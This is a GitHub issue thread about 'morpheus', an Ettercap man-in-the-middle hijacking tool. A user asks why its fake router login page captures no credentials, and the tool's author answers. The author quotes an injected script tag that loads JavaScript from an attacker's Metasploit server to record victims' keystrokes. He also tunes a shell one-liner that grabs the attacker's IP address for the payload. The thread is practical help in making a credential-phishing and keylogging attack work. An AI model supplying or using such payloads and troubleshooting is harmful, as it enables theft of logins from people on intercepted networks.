search

r00t-3xp10it / morpheus

Morpheus - Automating Ettercap TCP/IP (MITM-hijacking Tool)
836 stars 237 forks source link

Modem/router login webpage not working perfectly #2

Closed spiritedwolf closed 7 years ago

spiritedwolf commented 7 years ago

Now i am testing it in, OS:-BackBox 4.5 Metasploit path:- /opt/metasploit [I've installed it manually, community version]

screenshot - 12252016 - 10 32 34 am

So now in Backbox it showing me router login page but not capturing credentials/keystroke[s].

r00t-3xp10it commented 7 years ago


From that screenshot i can see that your metasploit does not have connected to the link inside index.html (router login fake webpage)


This is what appens when metasploit connects to the link (javascript) inside index.html poc1


Possible causes

1º - Edit var/www/html/index.html and check if the follow line its present: <script type='text/javascript' src='http://192.168.1.3:8080/support/test.js'></script></body> If that line its present in index.html it means that you have not loaded proper the webpage and the metasploit server did not have recive the connection form client (url link)...


2º - Another possible cause its my script store your ip addr with one 'empty space' into variable: <script type='text/javascript' src='http://192.168.1.3 :8080/support/test.js'></script></body> If exists an empty space in the javascript tag then it means that morpheus funtion that stores your ip addr its bad writen, replace that value (backbox) then: poc1

"And report back to me what is the new backbox configuration".


3º - Another possible cause its that you must wait for the msfconsole to load before trying to access any domain (domains with .com) in target browser.



HINT: only when metasploit identifies the 'client' it can start recording keystrokes... poc2


spiritedwolf commented 7 years ago

Well you are right, the problem is with 2nd one. [Blank spaces] screenshot - 12252016 - 10 10 30 pm

And i just find one way but its not properly showing me plane text. screenshot - 12252016 - 10 25 59 pm

So any suggestion's?

Edit:- Done you can use this:-

ifconfig | grep "inet " | grep -Fv 127.0.0.1 | awk '{print $2}' | cut -d ':' -f2

for BackBox. screenshot - 12252016 - 10 49 22 pm

r00t-3xp10it commented 7 years ago

I see now (backbox ifconfig conf), and i can tell you that the rigth bash command is:

ifconfig $InT3R | egrep -w 'inet' | awk {'print $2'} | cut -d ':' -f2

Its the same conf that ubuntu uses, so replace the backbox command by ubuntu.

spiritedwolf commented 7 years ago

ohh ok, i get it.